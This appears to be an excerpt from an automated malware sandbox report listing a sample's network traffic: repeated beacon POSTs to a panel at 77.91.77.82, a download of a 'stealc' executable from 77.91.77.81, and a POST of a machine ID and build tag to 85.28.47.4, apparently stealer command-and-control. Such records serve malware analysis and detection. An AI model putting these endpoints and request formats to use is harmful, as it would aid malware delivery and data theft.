                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
                        Source: global trafficHTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFBHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 44 30 46 45 31 37 31 41 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 2d 2d 0d 0a Data Ascii: ------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="hwid"8DD0FE171AAC3343412148------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="build"jony------HCAEGCBFHJDGCBFHDAFB--
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000006001&unit=246122658369
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
